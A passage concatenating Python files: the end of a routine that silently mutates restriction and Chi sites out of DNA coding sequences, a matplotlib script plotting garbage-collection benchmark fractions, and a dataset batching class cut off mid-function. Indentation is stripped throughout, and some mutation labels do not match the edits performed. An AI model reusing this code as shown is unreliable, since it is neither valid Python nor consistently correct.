outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "BbsI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "BbsI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BbsI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "BbsI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "BbsI: TCT"+str(k-2)+"AGC"
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "BbsI: T"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
bbsInst = 0
bsaInst = outSeq.seq.find("GGTCTC")
if bsaInst > 0:
m = 1
j = bsaInst % 3
k = bsaInst + 1
if j == 0:
k = k + 5
A = "BsaI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "BsaI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "BsaI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "BsaI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BsaI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "BsaI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "BsaI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "G"):
A = "BsaI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "A":
A = "BsaI: AGG"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
else:
A = "BsaI: TCT"+str(k-2)+"AGC"
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
changes.append(A)
bsaInst = 0
bsaInst = outSeq.seq.find("GAGACC")
if bsaInst > 0:
m = 1
j = bsaInst % 3
k = bsaInst + 1
if j == 0:
k = k + 2
A = "BsaI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "BsaI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
changes.append(A)
elif stK == "GA":
A = "BsaI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
changes.append(A)
elif stK == "AG":
A = "BsaI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
changes.append(A)
A = "BsaI: AGA"+str(k-2)+"CGT"
outSeq.seq = outSeq.seq[:k-3]+"CGT"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "G"):
A = "BsaI: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "A":
A = "BsaI: AGA"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
else:
A = "BsaI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
bsaInst = 0
mlyInst = outSeq.seq.find("GAGTC")
if mlyInst > 0:
m = 1
j = mlyInst % 3
k = mlyInst + 1
if j == 0:
k = k + 2
A = "MlyI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "MlyI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "MlyI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "MlyI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "MlyI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "MlyI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "MlyI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C" or stK == "A":
A = "MlyI: "+stK+"GA"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK == "G":
A = "MlyI: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "T":
A = "MlyI: G"+str(k-4)+"A"
outSeq.seq = outSeq.seq[:k-6]+"TAA"+outSeq.seq[k-3:]
else:
A = "MlyI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
mlyInst = 0
mlyInst = outSeq.seq.find("GACTC")
if mlyInst > 0:
m = 1
j = mlyInst % 3
k = mlyInst + 1
if j == 0:
k = k + 2
A = "MlyI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "MlyI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "MlyI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "MlyI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "MlyI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "MlyI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "MlyI: T"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C" or stK == "A":
A = "MlyI: "+stK+"GA"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
changes.append(A)
A = "MlyI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
mlyInst = 0
if 'GB' in stnds:
bsmInst = outSeq.seq.find("CGTCTC")
if bsmInst > 0:
m = 1
j = bsmInst % 3
k = bsmInst + 1
if j == 0:
k = k + 5
A = "BsmBI: C"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "BsmBI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "BsmBI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
A = "BsmBI: TCT"+str(k-2)+"AGC"
changes.append(A)
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
bsmInst = 0
bsmInst = outSeq.seq.find("GCAGAG")
if bsmInst > 0:
m = 1
j = bsmInst % 3
k = bsmInst + 1
if j == 0:
k = k + 2
A = "BsmBI: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
stJ = str(outSeq.seq[k+2])
if (stJ == "A" or stJ == "G"):
A = "BsmBI: AG"+stJ+str(k+1)+"CGT"
outSeq.seq = outSeq.seq[:k]+"CGT"+outSeq.seq[k+3:]
elif (stJ == "T"):
A = "BsmBI: AGT"+str(k+1)+"TCT"
outSeq.seq = outSeq.seq[:k]+"TCT"+outSeq.seq[k+3:]
elif (stK == "TT" or stK == "TA" or stK == "AA" or stK == "GA"):
A = "BsmBI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif (stK == "CG" or stK == "AC" or stK == "GC" or stK == "GG"):
A = "BsmBI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "GT":
A = "BsmBI: G"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif stK == "TC":
A = "BsmBI: TCG"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BsmBI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
else:
A = "BsmBI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 2
A = "BsmBI: AGA"+str(k)+"CGT"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
bsmInst = 0
btgzInst = outSeq.seq.find("GCGATG")
if btgzInst > 0:
m = 1
j = btgzInst % 3
k = btgzInst + 1
if j == 0:
k = k + 2
A = "BtgZI: G"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "AA" or stK == "GA"):
A = "BtgZI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
changes.append(A)
elif (stK == "AG"):
A = "BtgZI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
changes.append(A)
A = "BtgZI: A"+str(k)+"T"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "BtgZI: C"+str(k-3)+"T"
changes.append(A)
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
btgzInst = 0
btgzInst = outSeq.seq.find("CATCGC")
if btgzInst > 0:
m = 1
j = btgzInst % 3
k = btgzInst + 1
if j == 0:
k = k + 2
A = "BtgZI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "BtgZI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "BtgZI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C":
A = "BtgZI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-6]+"CCG"+outSeq.seq[k-3:]
changes.append(A)
A = "BtgZI: TCG"+str(k-2)+"AGC"
changes.append(A)
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
btgzInst = 0
if 'chi' in stnds:
chiInst = outSeq.seq.find("GCTGGTGG")
if chiInst > 0:
m = 1
j = chiInst % 3
k = chiInst + 1
if j == 0:
k = k + 2
A = "Chi site: T"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "TT" or stK == "TA" or stK == "AA" or stK == "GA"):
A = "Chi site: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif (stK == "CG" or stK == "AC" or stK == "GC" or stK == "GG"):
A = "Chi site: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "GT":
A = "Chi site: G"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif stK == "TC":
A = "Chi site: TCG"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
elif stK == "AG":
A = "Chi site: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
else:
A = "Chi site: G"+str(k+3)+"T"
outSeq.seq = outSeq.seq[:k+2]+"T"+outSeq.seq[k+3:]
changes.append(A)
elif j == 1:
k = k + 1
A = "Chi site: C"+str(k)+"T"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
chiInst = 0
chiInst = outSeq.seq.find("CCACCAGC")
if chiInst > 0:
m = 1
j = chiInst % 3
k = chiInst + 1
if j == 0:
k = k + 2
A = "Chi site: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "Chi site: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "Chi site: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "A" or stK == "G"):
A = "Chi site: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "Chi site: TCC"+str(k-3)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
changes.append(A)
chiInst = 0
stpCdn = str(outSeq.seq[-3:])
if (stpCdn == 'TGA' or stpCdn == 'TAG'):
A = 'Stop Codon: '+stpCdn+str(len(outSeq.seq)-3)+'TAA'
changes.append(A)
outSeq.seq = outSeq.seq[:-3]+'TAA'
if (stpCdn != 'TAA' and stpCdn != 'TAG' and stpCdn != 'TGA'):
print("Error: Go back, you need a stop codon - probably TAA")
sys.exit("Error: no stop codon")
if len(changes) > (len(outSeq.seq)/5):
m = 0
print("Error: Conflicting mutations")
for i in changes:
print(i)
print(recSeq.seq)
sys.exit("Error: Mutation limit exceeded")
#
# Test the output Protein sequence vs. the input Protein Sequence
#
outProt=outSeq.seq.translate()
inProt=recSeq.seq.translate()
if str(outProt) != str(inProt):
print(recSeq.seq)
print(outSeq.seq)
print(inProt)
print(outProt)
print("Error in silent mutation")
sys.exit("Error in silent mutation")
return
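The routine above only works if every base substitution it performs is synonymous. A small self-contained sketch (not part of this script; `translate` and `CODON_TABLE` are illustrative names) shows how such an edit can be checked against the standard genetic code:

```python
# Illustrative check (not from the original script): a restriction-site
# edit is "silent" when the translated protein is unchanged.  The 64-entry
# standard genetic code is built from the canonical TCAG ordering.
bases = "TCAG"
codons = [a + b + c for a in bases for b in bases for c in bases]
amino_acids = "FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG"
CODON_TABLE = dict(zip(codons, amino_acids))

def translate(seq):
    """Translate an in-frame DNA string into a one-letter protein string."""
    return "".join(CODON_TABLE[seq[i:i + 3]] for i in range(0, len(seq) - 2, 3))

# A SpeI site (ACTAGT) spans the codons ACT|AGT (Thr, Ser); changing the
# wobble base of the first codon (T -> C) destroys the site silently.
assert translate("ACTAGT") == translate("ACCAGT") == "TS"
```

This mirrors the script's final guard, which compares `outSeq.seq.translate()` against `recSeq.seq.translate()` and aborts when a substitution was not silent.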
# File: plot_functions.py (repo: junjieqian/ARES, license: MIT)
import matplotlib.pyplot as plt

def plot3(gcdict_default, mutatordict_default, gcdict_fifo, mutatordict_fifo, gcdict_improved, mutatordict_improved):
namelist = []
j = -1
xlist = []
ylist_gc_default = [] # GC
ylist_mu_default = [] # mutator
ylist_gc_fifo = [] # GC
ylist_mu_fifo = [] # mutator
ylist_gc_improved = []
ylist_mu_improved = []
#namelist = ['lusearch', 'xalan', 'sunflow', 'h2', 'eclipse', 'jython']
namelist = ['lusearch', 'xalan', 'sunflow', 'h2', 'eclipse', 'jython', 'eclipse', 'pmd', \
'avrora', 'tomcat', 'compiler.sunflow', 'crypto.aes', 'scimark.fft.large', 'xml.validation', 'xml.transform']
for name in namelist:
j += 1
xlist.append('1\n' + name)
xlist.append(' ')
xlist.append(' ')
xlist.append('2')
xlist.append(' ')
xlist.append(' ')
xlist.append('4')
xlist.append(' ')
xlist.append(' ')
xlist.append('8')
xlist.append(' ')
xlist.append(' ')
xlist.append('16')
xlist.append(' ')
xlist.append(' ')
xlist.append('32')
xlist.append(' ')
xlist.append(' ')
xlist.append('48')
xlist.append(' ')
xlist.append(' ')
xlist.append(' ')
list1 = gcdict_default[name]
list2 = mutatordict_default[name]
list3 = gcdict_fifo[name]
list4 = mutatordict_fifo[name]
list5 = gcdict_improved[name]
list6 = mutatordict_improved[name]
base = list1[0] + list2[0]
for i in range(len(list1)):
ylist_gc_default.append(float(list1[i])/float(base))
ylist_mu_default.append(float(list2[i])/float(base))
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_fifo.append(float(list3[i])/float(base))
ylist_mu_fifo.append(float(list4[i])/float(base))
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
ylist_gc_improved.append(float(list5[i])/float(base))
ylist_mu_improved.append(float(list6[i])/float(base))
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
del xlist[-1]
del ylist_gc_default[-1]
del ylist_mu_default[-1]
del ylist_mu_fifo[-1]
del ylist_gc_fifo[-1]
del ylist_gc_improved[-1]
del ylist_mu_improved[-1]
plt.figure(figsize=(20, 10))
plt.bar(range(len(ylist_mu_default)), ylist_mu_default, color="#5f9ea0", edgecolor="k", label="Existing Completion Time")
plt.bar(range(len(ylist_gc_default)), ylist_gc_default, bottom=ylist_mu_default, color='#0000ff', \
edgecolor="k", label="Existing Pause Time")
plt.bar(range(len(ylist_mu_fifo)), ylist_mu_fifo, color="#d3d3d3", edgecolor="k", label="FIFO Completion Time")
plt.bar(range(len(ylist_gc_fifo)), ylist_gc_fifo, bottom=ylist_mu_fifo, color='#696969', edgecolor="k", label="FIFO Pause Time")
plt.bar(range(len(ylist_mu_improved)), ylist_mu_improved, color="#d3d3d3", edgecolor="k", hatch='\\', label="Improved Completion Time")
plt.bar(range(len(ylist_gc_improved)), ylist_gc_improved, bottom=ylist_mu_improved, color='#696969', edgecolor="k", \
hatch='\\', label="Improved Pause Time")
plt.xticks(range(len(xlist)), xlist)
plt.xlim([0, len(xlist)])
plt.ylim([0, 2])
plt.legend(loc="upper center", ncol=3)
plt.xlabel("Benchmarks run with different processor cores number")
plt.ylabel("Fraction of GC and mutator in total")
plt.savefig("gcfraction.pdf", format='pdf', bbox_inches='tight')
plt.cla()
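`plot3` divides every GC and mutator time by the single-core total (`list1[0] + list2[0]`), so the first stacked bar of each benchmark has height exactly 1.0 and later bars read as run time relative to one core. A minimal sketch of that normalization (the helper name `normalized_fractions` is hypothetical, not from the repo):

```python
# Hypothetical helper showing plot3's scaling: every GC / mutator time is
# divided by the 1-core total, so the reference stacked bar is exactly 1.0
# and each later bar's height is the relative total run time.
def normalized_fractions(gc_times, mutator_times):
    base = gc_times[0] + mutator_times[0]
    gc = [g / base for g in gc_times]
    mutator = [m / base for m in mutator_times]
    return gc, mutator

gc, mu = normalized_fractions([2.0, 1.0], [8.0, 3.0])
assert gc[0] + mu[0] == 1.0              # reference bar has height 1.0
assert abs(gc[1] + mu[1] - 0.4) < 1e-12  # total time dropped to 40%
```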
def plot4(gcdict_default, mutatordict_default, gcdict_fifo, mutatordict_fifo, gcdict_improved, mutatordict_improved):
# plot the 48 cores only
namelist = []
j = -1
xlist = []
ylist_gc_default = [] # GC
ylist_mu_default = [] # mutator
ylist_gc_fifo = [] # GC
ylist_mu_fifo = [] # mutator
ylist_gc_improved = []
ylist_mu_improved = []
#namelist = ['lusearch', 'xalan', 'sunflow', 'h2', 'eclipse', 'jython']
namelist = ['lusearch', 'xalan', 'sunflow', 'h2', 'eclipse', 'jython', 'eclipse', 'pmd', \
'avrora', 'tomcat', 'compiler.sunflow', 'crypto.aes', 'scimark.fft.large', 'xml.validation', 'xml.transform']
for name in namelist:
j += 1
xlist.append(name)
xlist.append(' ')
xlist.append(' ')
xlist.append(' ')
xlist.append(' ')
list1 = gcdict_default[name]
list2 = mutatordict_default[name]
list3 = gcdict_fifo[name]
list4 = mutatordict_fifo[name]
list5 = gcdict_improved[name]
list6 = mutatordict_improved[name]
base = list1[0] + list2[0]
for i in range(len(list1)-1, len(list1)):
ylist_gc_default.append(float(list1[i])/float(base))
ylist_mu_default.append(float(list2[i])/float(base))
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_fifo.append(float(list3[i])/float(base))
ylist_mu_fifo.append(float(list4[i])/float(base))
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
ylist_gc_improved.append(float(list5[i])/float(base))
ylist_mu_improved.append(float(list6[i])/float(base))
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
del xlist[-1]
del ylist_gc_default[-1]
del ylist_mu_default[-1]
del ylist_mu_fifo[-1]
del ylist_gc_fifo[-1]
del ylist_gc_improved[-1]
del ylist_mu_improved[-1]
plt.figure(figsize=(20, 10))
plt.bar(range(len(ylist_mu_default)), ylist_mu_default, color="#5f9ea0", edgecolor="k", label="Existing Completion Time")
plt.bar(range(len(ylist_gc_default)), ylist_gc_default, bottom=ylist_mu_default, color='#0000ff', \
edgecolor="k", label="Existing Pause Time")
plt.bar(range(len(ylist_mu_fifo)), ylist_mu_fifo, color="#d3d3d3", edgecolor="k", label="FIFO Completion Time")
plt.bar(range(len(ylist_gc_fifo)), ylist_gc_fifo, bottom=ylist_mu_fifo, color='#696969', edgecolor="k", label="FIFO Pause Time")
plt.bar(range(len(ylist_mu_improved)), ylist_mu_improved, color="#d3d3d3", edgecolor="k", hatch='\\', label="Improved Completion Time")
plt.bar(range(len(ylist_gc_improved)), ylist_gc_improved, bottom=ylist_mu_improved, color='#696969', edgecolor="k", \
hatch='\\', label="Improved Pause Time")
plt.xticks(range(len(xlist)), xlist)
plt.xlim([0, len(xlist)])
plt.ylim([0, 2])
plt.legend(loc="upper center", ncol=3)
plt.xlabel("Benchmarks run with different processor cores number")
plt.ylabel("Fraction of GC and mutator in total")
plt.savefig("gcfraction.pdf", format='pdf', bbox_inches='tight')
plt.cla()
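Both plot functions draw three side-by-side bar groups over one shared x-range by padding each series with zeros in the slots that belong to the other two series. A standalone sketch of that interleaving trick (`interleave` is an illustrative helper, not from the repo):

```python
# Sketch of the zero-padding trick both plot functions use: n series share
# one x-range, and series s only holds real values in slots s, s+n, s+2n,
# ... so equal-x bars from different series never overlap.
def interleave(series_list):
    n = len(series_list)
    width = len(series_list[0]) * n
    out = [[0.0] * width for _ in series_list]
    for si, series in enumerate(series_list):
        for vi, value in enumerate(series):
            out[si][vi * n + si] = value
    return out

a, b, c = interleave([[1, 2], [3, 4], [5, 6]])
assert a == [1, 0.0, 0.0, 2, 0.0, 0.0]
assert b == [0.0, 3, 0.0, 0.0, 4, 0.0]
assert c == [0.0, 0.0, 5, 0.0, 0.0, 6]
```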
# File: utils/datamanager.py (repo: maestrojeong/Deep-Hash-Table-ICML18-, license: MIT)
import numpy as np
import random
class BasicDatamanager(object):
def __init__(self, image, label, nclass):
self.image = image
self.label = label
self.nclass = nclass
self.ndata = len(self.label)
self.fullidx = np.arange(self.ndata)
self.start = 0
self.end = 0
def print_shape(self):
print("Image shape : {}({})".format(self.image.shape, self.image.dtype))
print("Label shape : {}({})".format(self.label.shape, self.label.dtype))
def count_label(self):
counter = np.zeros(self.nclass)
for i in range(self.ndata):
counter[int(self.label[i])] += 1
return counter
def next_batch(self, batch_size):
'''
Args:
batch_size - int, number of samples to return
Return:
image
label
'''
if self.start == 0 and self.end ==0:
np.random.shuffle(self.fullidx) # shuffle first
if self.end + batch_size > self.ndata:
self.start = self.end
self.end = (self.end + batch_size)%self.ndata
self.subidx = np.append(self.fullidx[self.start:self.ndata], self.fullidx[0:self.end])
self.start = 0
self.end = 0
else:
self.start = self.end
self.end += batch_size
self.subidx = self.fullidx[self.start:self.end]
return self.image[self.subidx], self.label[self.subidx].astype('int32')
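`next_batch` above serves batches from a shuffled index array and stitches the tail of one epoch to the head of the next when a batch overruns the data. The wrap-around logic in isolation, using plain lists instead of NumPy (`take_wrapped` is a hypothetical name, not from the repo):

```python
# Minimal sketch of the wrap-around indexing used by next_batch().
def take_wrapped(idx, start, batch_size):
    """Return batch_size entries of idx starting at start, wrapping at the end."""
    n = len(idx)
    end = start + batch_size
    if end > n:
        return idx[start:n] + idx[0:end - n], end - n  # tail + head
    return idx[start:end], end % n

batch, nxt = take_wrapped(list(range(5)), 3, 4)
assert batch == [3, 4, 0, 1]   # overran the epoch, wrapped to the front
assert nxt == 2                # the next batch resumes at index 2
```

In the class above the same effect comes from `np.append(self.fullidx[self.start:self.ndata], self.fullidx[0:self.end])`.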
class ContrastDatamanager(object):
def __init__(self, image, label, nclass):
'''
Args:
image -
label -
nclass - number of total classes
'''
self.image = image
self.label = label
self.nclass = nclass
self.ndata = len(self.label)
self.pos_label_idx_set = [[idx for idx in range(self.ndata) if self.label[idx]==class_idx] for class_idx in range(self.nclass)]
self.neg_label_idx_set = [[idx for idx in range(self.ndata) if self.label[idx]!=class_idx] for class_idx in range(self.nclass)]
self.fullidx = np.arange(self.ndata)
self.start = 0
self.end = 0
def print_shape(self):
print("Image shape : {}".format(self.image.shape))
print("Label shape : {}".format(self.label.shape))
def count_label(self):
counter = np.zeros(self.nclass)
for i in range(self.ndata):
counter[int(self.label[i])] += 1
return counter
def change_nsclass(self, value):
self.nsclass = value
def next_batch(self, batch_size):
'''
Make a batch of anchor/pair images with binary similarity labels
Args:
batch_size - int, number of pairs to return
Return:
image - batch_size image
image_pair - batch_size image
label - batch_size binary label
pos to be 1
neg to be 0
'''
if self.start==0 and self.end==0:
np.random.shuffle(self.fullidx) # shuffle first
npositive = batch_size//2
nnegative = batch_size-npositive
self.binary_label = np.append(np.ones(npositive), np.zeros(nnegative))
if self.end + batch_size > self.ndata:
self.start = self.end
self.end = (self.end + batch_size)%self.ndata
self.subidx = np.append(self.fullidx[self.start:self.ndata], self.fullidx[0:self.end])
self.start = 0
self.end = 0
else:
self.start = self.end
self.end += batch_size
self.subidx = self.fullidx[self.start:self.end]
self.subidx_pair = list()
for i in range(batch_size):
anc_label = self.label[self.subidx[i]]
if i < npositive:
while True:
pos_sample = random.sample(self.pos_label_idx_set[anc_label], 1)[0]
if pos_sample!=self.subidx[i]:
break
self.subidx_pair.append(pos_sample)
else:
self.subidx_pair.append(random.sample(self.neg_label_idx_set[anc_label], 1)[0])
self.subidx_pair = np.array(self.subidx_pair)
return self.image[self.subidx], self.image[self.subidx_pair], self.binary_label
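The pair construction above gives the first half of the batch a same-class partner (binary label 1) and the second half a different-class partner (label 0), using the precomputed positive/negative index sets. A compact sketch of that sampling rule (`sample_pair` is an illustrative name, not a repo function):

```python
import random

# The first half of a contrastive batch pairs each anchor with a same-class
# sample (label 1); the second half pairs it with a different-class sample
# (label 0).  Anchors are excluded from their own positive candidates.
def sample_pair(labels, anchor_idx, positive):
    anchor_label = labels[anchor_idx]
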